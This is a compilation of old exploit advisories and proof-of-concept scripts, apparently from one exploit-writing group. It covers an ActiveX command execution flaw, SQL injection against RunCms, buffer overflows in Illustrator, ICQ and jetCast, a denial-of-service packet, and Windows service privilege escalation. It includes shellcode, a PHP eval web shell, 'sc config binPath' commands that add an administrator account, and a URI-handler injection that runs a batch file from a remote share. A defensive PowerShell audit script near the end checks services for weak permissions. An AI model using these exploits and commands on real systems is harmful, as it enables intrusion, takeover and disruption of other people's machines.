  /* DISPID=1 */ function CreateShortcut( /* VT_PTR [26] [in] -- VT_BSTR [8] */ $name, /* VT_PTR [26] [in] -- VT_BSTR [8] */ $target, /* VT_PTR [26] [in] -- VT_BSTR [8] */ $icon, /* VT_PTR [26] [in] -- VT_BSTR [8] */ $workingDir, /* VT_PTR [26] [in] -- VT_BSTR [8] */ $args ) { /* method CreateShortcut */ }
  /* DISPID=2 */ function DeleteShortcut( /* VT_PTR [26] [in] -- VT_BSTR [8] */ $name ) { /* method DeleteShortcut */ }
  /* DISPID=3 */ /* VT_BSTR [8] */ function ModuleFileName( ) { /* method ModuleFileName */ }
  /* DISPID=4 */ /* VT_BSTR [8] */ function GetSpecialFolder( /* VT_UI4 [19] [in] */ $__MIDL_0025 ) { /* method GetSpecialFolder */ }
  /* DISPID=5 */ /* VT_BOOL [11] */ function CheckWnd( /* VT_PTR [26] [in] -- VT_BSTR [8] */ $__MIDL_0026 ) { /* method CheckWnd */ }
  /* DISPID=6 */ /* VT_BSTR [8] */ function ExistingTPS( /* VT_PTR [26] [in] -- VT_BSTR [8] */ $__MIDL_0028 ) { /* method ExistingTPS */ }
  /* DISPID=7 */ function SetWorkingDir( /* VT_PTR [26] [in] -- VT_BSTR [8]
RealNetworks RealGames StubbyUtil.ProcessMgr.1 ActiveX Control (InstallerDlg.dll v2.6.0.445) Multiple Remote Commands Execution Vulnerabilities
RealNetworks RealGames StubbyUtil.ProcessMgr.1 ActiveX Control (InstallerDlg.dll v2.6.0.445) Multiple Remote Commands Execution Vulnerabilities

tested against Internet Explorer 9, Vista sp2
download url: http://www.gamehouse.com/

background:
When choosing to play these online games, e.g. the game called My Farm Life (see url: http://www.gamehouse.com/download-games/my-farm-life ), you download an installer called GameHouse-Installer_am-myfarmlife_gamehouse_.exe. This setup program installs an ActiveX control with the following settings:

CLSID: {5818813E-D53D-47A5-ABBB-37E2A07056B5}
ProgID: StubbyUtil.ProcessMgr.1
Binary Path: C:\Program Files\RealArcade\Installer\bin\InstallerDlg.dll
Safe For Initialization (Registry): True
Safe For Scripting (Registry): True

This control is marked safe for scripting and safe for initialization, so Internet Explorer will allow remote web pages to script it.

vulnerability:
This control has four methods implemented insecurely:

CreateVistaTaskLow() - launches arbitrary commands
Exec() - launches arbitrary commands
ExecLow() - launches arbitrary commands
ShellExec() - launches arbitrary executables

other attacks are possible, see the typelib:

class IProcessMgr { /* GUID={860450DB-79C1-44E4-96E0-C89144E4B444} */
  /* DISPID=1610612736 */ function QueryInterface( /* VT_PTR [26] [in] -- ? [29] */ $riid, /* VT_PTR [26] [out] -- VT_PTR [26] */ $ppvObj ) { }
  /* DISPID=1610612737 */ /* VT_UI4 [19] */ function AddRef( ) { }
  /* DISPID=1610612738 */ /* VT_UI4 [19] */ function Release( ) { }
  /* DISPID=1610678272 */ function GetTypeInfoCount( /* VT_PTR [26] [out] -- VT_UINT [23] */ $pctinfo ) { }
  /* DISPID=1610678273 */ function GetTypeInfo( /* VT_UINT [23] [in] */ $itinfo, /* VT_UI4 [19] [in] */ $lcid, /* VT_PTR [26] [out] -- VT_PTR [26] */ $pptinfo ) { }
  /* DISPID=1610678274 */ function GetIDsOfNames( /* VT_PTR [26] [in] -- ? [29] */ $riid, /* VT_PTR [26] [in] -- VT_PTR [26] */ $rgszNames, /* VT_UINT [23] [in] */ $cNames, /* VT_UI4 [19] [in] */ $lcid, /* VT_PTR [26] [out] -- VT_I4 [3] */ $rgdispid ) { }
  /* DISPID=1610678275 */ function Invoke( /* VT_I4 [3] [in] */ $dispidMember, /* VT_PTR [26] [in] -- ? [29] */ $riid, /* VT_UI4 [19] [in] */ $lcid, /* VT_UI2 [18] [in] */ $wFlags, /* VT_PTR [26] [in] -- ? [29] */ $pdispparams, /* VT_PTR [26] [out] -- VT_VARIANT [12] */ $pvarResult, /* VT_PTR [26] [out] -- ? [29] */ $pexcepinfo, /* VT_PTR [26] [out] -- VT_UINT [23] */ $puArgErr ) { }
  /* DISPID=1 */ /* VT_BOOL [11] */ function Exec( /* VT_PTR [26] [in] -- VT_BSTR [8] */ $mod, /* VT_PTR [26] [in] -- VT_BSTR [8] */ $cmdline, /* VT_BOOL [11] [in] */ $__MIDL_0097, /* VT_BOOL [11] [in] */ $__MIDL_0098, /* VT_PTR [26] [in] -- VT_BSTR [8] */ $__MIDL_0099 ) { /* method Exec */ }
  /* DISPID=2 */ /* VT_BOOL [11] */ function IsFinished( ) { }
  /* DISPID=3 */ /* VT_UI4 [19] */ function CreateNamedMutex( /* VT_BSTR [8] [in] */ $__MIDL_0102 ) { }
  /* DISPID=4 */ function ReleaseMutex( /* VT_UI4 [19] [in] */ $__MIDL_0104 ) { }
  /* DISPID=5 */ function CloseMutex( /* VT_UI4 [19] [in] */ $__MIDL_0105 ) { }
  /* DISPID=6 */ /* VT_BOOL [11] */ function ObtainMutex( /* VT_UI4 [19] [in] */ $__MIDL_0106 ) { }
  /* DISPID=7 */ /* VT_BOOL [11] */ function WaitOnMutex( /* VT_UI4 [19] [in] */ $__MIDL_0108, /* VT_INT [22] [in] */ $__MIDL_0109 ) { }
  /* DISPID=8 */ function CloseEvent( /* VT_UI4 [19] [in] */ $__MIDL_0111 ) { }
  /* DISPID=9 */ function FireEvent( /* VT_UI4 [19] [in] */ $__MIDL_0112 ) { }
  /* DISPID=10 */ /* VT_UI4 [19] */ function
Adobe Illustrator CS4 (V14.0.0) Encapsulated Postscript (.eps) Overlong DSC Comment Buffer Overflow Exploit
<?php
/*
Adobe Illustrator CS4 (V14.0.0) Encapsulated Postscript (.eps) overlong DSC Comment Buffer Overflow Exploit
by Nine:Situations:Group::pyrokinesis
site: http://retrogod.altervista.org/

An overlong string as DSC comment (more than 42000 bytes) results in a direct EIP overwrite.
The exception is first-chance, so the program never crashes. At the moment of the redirection
EAX and ESI are user-controlled. This portion of the buffer begins with '%' (it is the next
DSC comment) but, as you can see, the resulting pattern is nop-equivalent.

Tested and working against xp sp3. Change the call esi if you need to; it must be alphabetic.
I used a call esi from comctl32.dll on xp sp3, change if needed.

Usage: php 9sg_illu.php
then double-click on the resulting 9sg.eps file; it will bind a shell on the port set in the
shellcode. Change the shellcode for your needs.
*/

# windows/adduser - 446 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_mixed
# EXITFUNC=seh, USER=adobe, PASS=kills

# windows/shell_bind_tcp - 696 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_mixed
# EXITFUNC=seh, LPORT=, RHOST=
RunCms v.2M1 /modules/forum/post.php - 'forum' remote semi-blind SQL Injection Exploit
<?php
/*
RunCms v.2M1 /modules/forum/post.php - 'forum' remote semi-blind SQL Injection Exploit
by Nine:Situations:Group::bookoo
site: http://retrogod.altervista.org/
software site: http://www.runcms.org/

vulnerable code in /modules/forum/post.php near lines 16-34:

...
if ( empty($_POST['forum']) ) {
    redirect_header("index.php", 2, _MD_ERRORFORUM);
    exit();
} else if ( empty($_POST['message']) ) {
    redirect_header("javascript:history.go(-1)", 2, _MD_ERRORMESSAGE);
    exit();
} else {
    $sql = "SELECT * FROM ".$bbTable['forums']." WHERE forum_id = ".$_POST['forum'].""; // !!!
    if (!$result = $db->query($sql)) {
        redirect_header("index.php", 2, _MD_CANTGETFORUM);
        exit();
    }
...

The 'forum' variable is taken from the $_POST[] array and inserted in a SQL query without prior sanitization and without being surrounded by quotes.
Then you can subsequently manipulate this query in /modules/forum/class/class.permissions.php by passing another 'UNION SELECT' as first argument of the 'UNION SELECT' passed to post.php (a little bit complex, uh? $forum_id is user controlled ...), lines 100-102:

...
if ($user_id > 0) {
    $sql = "SELECT * FROM ".$bbTable['forum_access']." WHERE forum_id=$forum_id AND user_id=$user_id";
...

The result is that you can extract the sha1 hash of the admin user and the corresponding salt.
If you cannot crack the hash ... you can always hijack an active session (meaning the admin user must be logged in) by building the admin cookie; there is no check, e.g., on the IP address.
To do that you need the table prefix. A default one does not exist, but there is a 'suggested' one when installing the cms, which is 'runcms', and an empty one is not allowed.
However, with MySQL 5.0 you can get the table prefix by interrogating information_schema.TABLES.

This whole thing works regardless of php.ini settings, but you need:
- a valid user account. Register!
- an existing row in the [prefix]_forum_forums table
- an existing row in the [prefix]_forum_forum_access table
which is very likely against a runcms installation with a working and active forum.

Also, you could manipulate the query in post.php to export a php shell through the 'INTO DUMPFILE' method, but you need the FILE privilege and magic_quotes_gpc = off.

It's also possible to disclose the absolute path in certain conditions (see error_reporting) by polluting a preg_match() argument:

http://[host]/[path_to_runcms]/modules/contact/index.php?op[]=1
http://[host]/[path_to_runcms]/userinfo.php?uid[]=1

Final notes:
This sql injection vulnerability has to be considered high risk because as ADMIN you can inject php code through the Filter/Banning functionalities, ex:
click 'Administration Menu', then 'System Admin', then click on the Filters/Banning icon, then 'Prohibited: Emails'.
Now you can edit the /modules/system/cache/bademails.php file. Type in:

<?php eval($_GET[c]);?>

then you launch commands:

http://[host]/[path_to_runcms]/modules/system/cache/bademails.php?c=system("dir");

you can do the same with all filter utilities ...
*/

$err[0] = "[!] This script is intended to be launched from the cli!";
$err[1] = "[!] You need the curl extension loaded!";

function my_header() {
    print("\x52\x75\x6e\x43\x6d\x73\x20\x76\x2e\x32\x6d\x31\x20\x2f\x6d\x6f\x64\x75\x6c\x65\x73\x2f\x66\x6f\x72\x75\x6d\x2f\x70\x6f\x73\x74\x2e\x70\x68\x70\x20\x2d\x20\x27\x66\x6f\x72\x75\x6d\x27\x20\x72\x65\x6d\x6f\x74\x65\x20\x73\x65\x6d\x69\x2d\x62\x6c\x69\x6e\x64\x20\x53\x51\x4c\x20\x49\x6e\x6a\x65\x63\x74\x69\x6f\x6e\x20\x45\x78\x70\x6c\x6f\x69\x74\x20\xd\xa\x62\x79\x20\x4e\x69\x6e\x65\x3a\x53\x69\x74\x75\x61\x74\x69\x6f\x6e\x73\x3a\x47\x72\x6f\x75\x70\x3a\x3a\x62\x6f\x6f\x6b\x6f\x6f\xd\xa\x73\x69\x74\x65\x3a\x20\x68\x74\x74\x70\x3a\x2f\x2f\x72\x65\x74\x72\x6f\x67\x6f\x64\x2e\x61\x6c\x74\x65\x72\x76\x69\x73\x74\x61\x2e\x6f\x72\x67\x2f\xd\xa\n");
}

my_header();

if (php_sapi_name() != "cli") {
    die($err[0]);
}

if (!extension_loaded('curl')) {
    $win = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') ? true : false;
    if ($win) {
        !dl("php_curl.dll") ? die($err[1]) : print("[*] curl loaded\n");
    } else {
        !dl("php_curl.so") ? die($err[1]) : print("[*] curl loaded\n");
    }
}

function syntax() {
    print ("Syntax: php ".$argv[0]." [host] [path] [user] [pass] [OPTIONS]\n".
           "Options:\n".
           "--port:[port] - specify a port
EMC RepliStor Server (rep_serv.exe) 6.3.1.3 remote denial of service
<?php
/*
EMC RepliStor Server (rep_serv.exe) 6.3.1.3 remote denial of service poc
by Nine:Situations:Group::bellick
*/

$host = "192.168.0.1";
$port = 7144;

$_sock = fsockopen($host, $port, $errno, $errstr, 2);
if (!$_sock) {
    echo "$errstr ($errno)\n";
} else {
    $_p = "\x54\x93\x00\x00\x41\x41\x41\x41\x41\x41\x41\x41".
          "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
          "\x41\x41\x41\x41";
    fputs($_sock, $_p);
    fclose($_sock);
}
?>

original url: http://retrogod.altervista.org/9sg_emc_repli_crash.html
South River Technologies WebDrive Service Bad Security Descriptor Local Elevation Of Privileges
South River Technologies WebDrive Service Bad Security Descriptor Local Elevation Of Privileges
by Nine:Situations:Group::bellick
site: http://retrogod.altervista.org/
Software site: http://www.webdrive.com/
Download location: http://www.webdrive.com/download/index.html

Tested against: South River Technologies WebDrive 9.02 build 2232 on Microsoft Windows XP SP3

The WebDrive Service is installed with an empty security descriptor. A malicious user can stop the service, then invoke the sc config command to replace the binary path with a value of choice, then restart the service to run the command with SYSTEM privileges.

ex., run these commands as a limited user:

sc stop WebDriveService
sc config WebDriveService binPath= "cmd /c net user southriver kills /add && net localgroup Administrators southriver /add"
sc start WebDriveService
runas /noprofile /user:%COMPUTERNAME%\southriver cmd

now login as administrator with password kills

mitigation: the security descriptor of the service is like this:

C:\>sc sdshow WebDriveService

D:

change the security descriptor like the following:

c:\>sc sdset WebDriveService D:(A;;CCLCSWLOCRRC;;;AU)(A;;CCLCSWRPLOCRRC;;;PU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWRPWPDTLOCRRC;;;SY)
[SC] SetServiceObjectSecurity SUCCESS

original url: http://retrogod.altervista.org/9sg_south_river_priv.html
google apps googleapps.url.mailto:// uri handler cross-browser remote command execution exploit (IE)
google apps googleapps.url.mailto:// uri handler cross-browser remote command execution exploit (Internet Explorer)
by nine:situations:group::pyrokinesis
site: http://retrogod.altervista.org/
software site: http://pack.google.com/intl/it/pack_installer.html

tested against:
Internet Explorer 8, windows xp sp3
Internet Explorer 7, windows xp sp3
Google Chrome 2.0.172.43

vulnerability:
through the vulnerable googleapps.url.mailto:// deprecated uri handler, registered as follows:

[HKEY_CLASSES_ROOT\GoogleApps.Url.mailto]
@="Google Apps URL"
"EditFlags"=hex:02,00,00,00
"FriendlyTypeName"="Google Apps URL"
"URL Protocol"=""

[HKEY_CLASSES_ROOT\GoogleApps.Url.mailto\DefaultIcon]
@="C:\\Programmi\\Google\\Google Apps\\googleapps.exe,0"

[HKEY_CLASSES_ROOT\GoogleApps.Url.mailto\shell]

[HKEY_CLASSES_ROOT\GoogleApps.Url.mailto\shell\open]

[HKEY_CLASSES_ROOT\GoogleApps.Url.mailto\shell\open\command]
@="\"C:\\Programmi\\Google\\Google Apps\\googleapps.exe\" --mailto.google.com=\"%1\""

it is possible, against all versions of Internet Explorer, to inject the --domain= switch of the googleapps.exe executable and so pass arbitrary switches to the Google Chrome chrome.exe executable (which is subsequently launched to open the gmail pages), for example the --renderer-path and --no-sandbox switches.
Through them it is possible to launch an arbitrary executable from the local system:

googleapps.url.mailto://%20--domain=--what%20--renderer-path=calc%20--no-sandbox%20--x/

or to launch an arbitrary batch file from a remote network share:

googleapps.url.mailto://%20--domain=--x%20--renderer-path=\\192.168.0.1\uncshare\sh.bat%20--no-sandbox%20--x/

the resulting command line for chrome.exe is in this case:

C:\Programmi\Google\Chrome\Application\chrome.exe --app=https://mail.google.com/a/--x --renderer-path=\\192.168.0.1\uncshare\sh.bat --no-sandbox --x//?view=cm&fs=1&to=googleapps.url.mailto%3A%2F%2F&rlz=1R6GPCK_en___IT344

which leverages the remote command execution issue.

Mitigation: unregister the uri handler by deleting the mentioned registry keys

original url: http://retrogod.altervista.org/9sg_google_apps_uri.html
Adobe Photoshop Elements 8.0 Active File Monitor Service Bad Security Descriptor Local Elevation Of Privileges
Adobe Photoshop Elements 8.0 Active File Monitor Service Bad Security Descriptor Local Elevation Of Privileges
by Nine:Situations:Group::bellick
site: http://retrogod.altervista.org/

Tested on Microsoft Windows XP SP3

The Adobe Active File Monitor V8 service is installed with an improper security descriptor. A malicious user of the Users group (which on xp means a limited account) can stop the service, then invoke the sc config command to replace the binary path with a value of choice, then restart the service to run the command with SYSTEM privileges.

ex., run these commands as a limited user:

sc stop AdobeActiveFileMonitor8.0
sc config AdobeActiveFileMonitor8.0 binPath= "cmd /c net user adobe kills /add && net localgroup Administrators adobe /add"
sc start AdobeActiveFileMonitor8.0
runas /noprofile /user:%COMPUTERNAME%\adobe cmd

now login as administrator with password kills

mitigation: the security descriptor of the service is like this:

C:\>sc sdshow AdobeActiveFileMonitor8.0

D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;AU)(A;;CCLCSWRPWPDTLOCRRC;;;PU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

note the WO and WD permissions for Everyone (!)

change the security descriptor like the following:

c:\>sc sdset AdobeActiveFileMonitor8.0 D:(A;;CCLCSWLOCRRC;;;AU)(A;;CCLCSWRPLOCRRC;;;PU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWRPWPDTLOCRRC;;;SY)
[SC] SetServiceObjectSecurity SUCCESS

readings, interesting article: http://msmvps.com/blogs/erikr/archive/2007/09/26/set-permissions-on-a-specific-service-windows.aspx

original url: http://retrogod.altervista.org/9sg_adobe_pe_local.html
EPSON Status Monitor 3 local privilege escalation vulnerability
---
EPSON Status Monitor 3 local privilege escalation vulnerability
by Nine:Situations:Group::bruiser
site: http://retrogod.altervista.org/

After pyrokinesis found http://www.milw0rm.com/exploits/9199 I prepared a tool to check for weak permissions and I came out with this:

C:\>sc qc EPSON_EB_RPCV4_01
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: EPSON_EB_RPCV4_01
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Documents and Settings\All Users\Application Data\EPSON\EPW!3 SSRP\E_S40ST7.EXE
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : EPSON V5 Service4(01)
        DEPENDENCIES       : RpcSs
        SERVICE_START_NAME : LocalSystem

C:\>CACLS "C:\Documents and Settings\All Users\Application Data\EPSON\EPW!3 SSRP\E_S40ST7.EXE"
C:\Documents and Settings\All Users\Application Data\EPSON\EPW!3 SSRP\E_S40ST7.EXE Everyone:F   <--[ :( !!!]

C:\>SC QC EPSON_PM_RPCV4_01
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: EPSON_PM_RPCV4_01
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Documents and Settings\All Users\Application Data\EPSON\EPW!3 SSRP\E_S40RP7.EXE
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : EPSON V3 Service4(01)
        DEPENDENCIES       : RpcSs
        SERVICE_START_NAME : LocalSystem

C:\>CACLS "C:\Documents and Settings\All Users\Application Data\EPSON\EPW!3 SSRP\E_S40RP7.EXE"
C:\Documents and Settings\All Users\Application Data\EPSON\EPW!3 SSRP\E_S40RP7.EXE Everyone:F   <--[ :( !!!]

The executable files are installed with full control for Everyone; replace them with your favourite rootkit.
They are carried by an EPSON STYLUS SX100 drivers cd.
C'mon guys, no need for an exploit code, it can be triggered by the available command line tools.

original url: http://retrogod.altervista.org/9sg_EPSON_local.html
Adobe related service (getPlus_HelperSvc.exe) local elevation of privileges
Adobe related service (getPlus_HelperSvc.exe) local elevation of privileges
by Nine:Situations:Group

description: Adobe downloader used to download updates for Adobe applications. Shipped with Acrobat Reader 9.x
vendor: NOS Microsystems

poc:

C:\>sc qc "getPlus(R) Helper"
[SC] GetServiceConfig SUCCESS

SERVICE_NAME: getPlus(R) Helper
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 3   DEMAND_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Programmi\NOS\bin\getPlus_HelperSvc.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : getPlus(R) Helper
        DEPENDENCIES       : RPCSS
        SERVICE_START_NAME : LocalSystem

C:\>cacls C:\Programmi\NOS\bin\getPlus_HelperSvc.exe
C:\Programmi\NOS\bin\getPlus_HelperSvc.exe BUILTIN\Users:F   <-- [!!!]
                                           NT AUTHORITY\SYSTEM:F

The executable file is installed with improper permissions, with full control for Builtin Users; a simple user can replace it with a binary of choice. At the next reboot it will run with SYSTEM privileges.

original url: http://retrogod.altervista.org/9sg_adobe_local.html
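An added audit script, written for this listing and not taken from any of the advisories above, that checks a host for both weaknesses at once: the permissive service DACLs of the WebDrive and Adobe Active File Monitor entries and the world-writable service binaries of the EPSON and getPlus entries. The trustee list, the rights it treats as hijackable and the parsing of sc sdshow / Win32_Service output are this script's own assumptions.

```powershell
# Added example, not part of the original advisories: audits every installed service for
# the two weaknesses shown above: a service DACL that lets low-privilege SIDs stop or
# reconfigure it (WebDrive, Adobe Active File Monitor) and a service binary that
# Everyone / BUILTIN\Users can overwrite (EPSON, getPlus). Assumes stock sc.exe,
# Get-Acl and the Win32_Service CIM class; the trustee and rights lists are assumptions.

# SDDL trustees a limited user belongs to: Everyone, Authenticated Users, Users,
# Interactive, Anonymous.
$LowPrivSids = @('WD', 'AU', 'BU', 'IU', 'AN')
# Service rights that allow the hijack shown above: change config (DC), stop (WP),
# write DACL (WD), write owner (WO), generic all / write (GA, GW).
$HijackRights = @('DC', 'WP', 'WD', 'WO', 'GA', 'GW')

function Test-ServiceSddl {
    param([string]$Sddl)
    $findings = @()
    $dacl = if ($Sddl -match 'D:(.*?)(S:|$)') { $Matches[1] } else { '' }
    # "D:" with no ACEs, as sc sdshow printed for WebDriveService, is reported as-is.
    if ($dacl -eq '') { return @('DACL is empty (no ACEs)') }
    # ACE layout: (type;flags;rights;object_guid;inherit_guid;trustee)
    foreach ($ace in [regex]::Matches($dacl, '\(([^;]*);([^;]*);([^;]*);[^;]*;[^;]*;([^)]*)\)')) {
        if ($ace.Groups[1].Value -ne 'A') { continue }   # only Allow ACEs grant rights
        $rights  = $ace.Groups[3].Value
        $trustee = $ace.Groups[4].Value
        if ($LowPrivSids -notcontains $trustee) { continue }
        if ($rights -like '0x*') { $findings += "$trustee has raw mask $rights (review manually)"; continue }
        # rights are a run of two-letter codes, e.g. CCDCLCSWRPWPDTLOCRSDRCWDWO
        $bad = [regex]::Matches($rights, '..') | ForEach-Object { $_.Value } |
               Where-Object { $HijackRights -contains $_ }
        if ($bad) { $findings += "$trustee granted $($bad -join ',')" }
    }
    return $findings
}

function Get-ServiceBinaryPath {
    param([string]$PathName)
    if ($PathName -match '^\s*"([^"]+)"') { return $Matches[1] }
    # unquoted path with spaces and arguments, like the EPSON one above
    if ($PathName -match '^\s*(.+?\.exe)') { return $Matches[1] }
    return ($PathName -split '\s+')[0]
}

function Test-BinaryAcl {
    param([string]$Path)
    $findings = @()
    if (-not (Test-Path -LiteralPath $Path)) { return @("binary not found: $Path") }
    # Any of these lets a limited user swap the binary, as in the cacls output above.
    $writeMask   = [int][System.Security.AccessControl.FileSystemRights]'Write, Delete, ChangePermissions, TakeOwnership'
    $genericMask = 0x10000000 -bor 0x40000000   # GENERIC_ALL | GENERIC_WRITE, not mapped by the enum
    foreach ($ace in (Get-Acl -LiteralPath $Path).Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        $who = $ace.IdentityReference.Value
        if ($who -notmatch '^(Everyone|BUILTIN\\Users|NT AUTHORITY\\(Authenticated Users|INTERACTIVE|ANONYMOUS LOGON))$') { continue }
        $mask = [int]$ace.FileSystemRights
        if ((($mask -band $writeMask) -ne 0) -or (($mask -band $genericMask) -ne 0)) {
            $findings += "$who can modify the binary ($($ace.FileSystemRights))"
        }
    }
    return $findings
}

# Walk every service; sc.exe sdshow prints a blank line followed by the SDDL string.
$report = foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
    $sddl = ((& sc.exe sdshow $svc.Name 2>$null) -join '').Trim()
    $issues = @()
    if ($sddl) { $issues += @(Test-ServiceSddl -Sddl $sddl | ForEach-Object { "DACL: $_" }) }
    if ($svc.PathName) {
        $issues += @(Test-BinaryAcl -Path (Get-ServiceBinaryPath -PathName $svc.PathName) | ForEach-Object { "FILE: $_" })
    }
    if ($issues.Count -gt 0) {
        [pscustomobject]@{ Service = $svc.Name; Path = $svc.PathName; Issues = ($issues -join '; ') }
    }
}
$report | Format-List
```

Run it from an elevated prompt so sc sdshow can read every descriptor; a service flagged under DACL is fixed with sc sdset as the entries above show, and one flagged under FILE by tightening the binary's ACL to SYSTEM and Administrators.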
ICQ 6.5 URL Search Hook/ICQToolBar.dll .URL file processing Windows Explorer remote buffer overflow poc
<?php
/*
ICQ 6.5 URL Search Hook/ICQToolBar.dll .URL file processing Windows Explorer remote buffer overflow poc
by Nine:Situations:Group::pyrokinesis
site: http://retrogod.altervista.org/

If the resulting file is placed on the desktop, against e.g. xp sp3, the explorer.exe process will exit with code 1282 (0x502), that is ERROR_STACK_BUFFER_OVERRUN, and crash indefinitely; you cannot even browse a folder if the file is present in it.

Solution: disable the shell extension, you may try shellexview by nirsoft

Note (added 30/05/2009, remote vector added): it works with network folders too ...
against a win2k3 where explorer.exe is not patched with the /GS flag:

(f44.104): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=02100068 ebx=772a23c1 ecx=0210cefa edx=0823 esi=00610061 edi=00000000
eip=772a533f esp=0210cec0 ebp=0210cec4 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
SHLWAPI!Ordinal400+0x2d:
772a533f 668906          mov     word ptr [esi],ax        ds:0023:00610061=????
0:010> g
(f44.104): Access violation - code c0000005 (!!! second chance !!!)
eax=02100068 ebx=772a23c1 ecx=0210cefa edx=0823 esi=00610061 edi=00000000
eip=772a533f esp=0210cec0 ebp=0210cec4 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
SHLWAPI!Ordinal400+0x2d:
772a533f 668906          mov     word ptr [esi],ax        ds:0023:00610061=????
0:010> gn
eax=0001 ebx=00000000 ecx=00000000 edx=00000000 esi=00000000 edi=0001
eip=7ffe0304 esp=0178fcf0 ebp=0178ff44 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=0246
SharedUserData!SystemCallStub+0x4:
7ffe0304 c3              ret

prepare a network folder with the .url file inside. This works against Internet Explorer too, by a hyperlink to the network folder
*/

$x = "[InternetShortcut]\x0d\x0a".
     "URL=".str_repeat("\x61", 2184);
file_put_contents("9sg_poc.url", $x);
?>

#original url: http://retrogod.altervista.org/9sg_icq_dos.html
COWON America jetCast 2.0.4.1109 (.mp3) local heap buffer overflow exploit
<?php
/*
COWON America jetCast 2.0.4.1109 (.mp3) local heap buffer overflow exploit (xp/sp3)
by Nine:Situations:Group::pyrokinesis
site: http://retrogod.altervista.org/
software site: http://www.jetaudio.com/

Tested against JetAudio pack v.7.5.2

- Passing an overlong string as id3 tag we have:

(370.7a8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=41414141 ebx=0394 ecx=41414141 edx=00160608 esi=010c1a00 edi=0302fbc8
eip=00486db7 esp=0302fb14 ebp=0302fe7c iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010212
jetCast+0x86db7:
00486db7 8b11            mov     edx,dword ptr [ecx]  ds:0023:41414141=????

code:

00486DB7  |. 8B11          MOV EDX,DWORD PTR DS:[ECX]        <---crash
00486DB9  |. 8B8D ACFC     MOV ECX,DWORD PTR SS:[EBP-354]
00486DBF  |. FF52 0C       CALL DWORD PTR DS:[EDX+C]
...

- We have 4 bytes of ecx to redirect the program to edi, which keeps our buffer. To do that, first we set ecx to a portion of memory which *always* (or nearly) keeps the filename. Look at 0x0105... no null char allowed, so I will use 0x01050101 to hit the right offset. To build it we need an address which points to a known call edi, compatible with windows filenames. To achieve that you may do so:

x...@pyro ~/framework-2.2/tools $ memdump (pid) jetcast
x...@pyro ~/framework-2.2/tools $ cd ..
x...@pyro ~/framework-2.2/ $ msfpescan -d ./tools/jetcast/ -j edi
0x7d03388b   call edi
...
x...@pyro ~/framework-2.2/tools $ msfpescan -d ./tools/jetcast/ -x "\x8b\x38\x03\x7d"
0x028997c4   8b38037d
0x77e062f5   8b38037d
...

then subtract c. Repeat this for each call edi; it took me some time to find every combination with a script, and I finally found a good one in the MSVCRT.DLL shipped with the program; a third match seems not possible.

Note: the first bytes of EDI hold some null chars, but as you can see this portion is nop-equivalent:

0348FBC8  0000  ADD BYTE PTR DS:[EAX],AL
0348FBCA  0000  ADD BYTE PTR DS:[EAX],AL
0348FBCC  0000  ADD BYTE PTR DS:[EAX],AL
0348FBCE  0000  ADD BYTE PTR DS:[EAX],AL
0348FBD0  90    NOP
0348FBD1  90    NOP
0348FBD2  90    NOP
...

Usage: php 9sg_jetcast_poc.php
It creates 4 files on your desktop; it says which will hit the right offset on your system (the file path is important to achieve arbitrary code execution on a victim user, so an attacker should persuade him to try to stream them ...).
It works by dragging the file on it or by right clicking and selecting "Add files ...", not 100% reliable, version specific...
-
*/

error_reporting(0);

if (php_sapi_name() != "cli") {
    die("[!] Launch from the cli!");
}

$scode = "\xeb\x1b\x5b\x31\xc0\x50\x31\xc0\x88\x43\x59\x53".
         "\xbb\x0d\x25\x86\x7c".                 // WinExec, 0x7c86250d
         "\xff\xd3\x31\xc0\x50".
         "\xbb\x12\xcb\x81\x7c".                 // ExitProcess, 0x7c81cb12
         "\xff\xd3\xe8\xe0\xff\xff\xff\x63\x6d\x64\x2e\x65".
         "\x78\x65\x20\x2f\x63\x20".             // "cmd.exe /c "
         "calc ".
         "\xff";

if (strlen($scode) > 118) {
    die("[!] Shellcode too large here!");
}

$BOOM = "\x49\x44\x33\x03\x00\x00\x00\x00\x07\x7b\x54\x49\x54\x32\x00\x00\x03\xbe\x00\x00\x00".
        str_repeat("\x90", 0x7c).               // nop, very reusable
        "\xeb\x06\x90\x90".                      // jmp short
        //"\x01\x01\x06\x01".                    // less usually in this location...
        "\x01\x01\x05\x01".                      // eax -> ecx, this works 80% of the times
        "\x90\x90\x90\x90".                      // nop
        $scode.
        str_repeat("A", 0x01f0 - strlen($scode)).
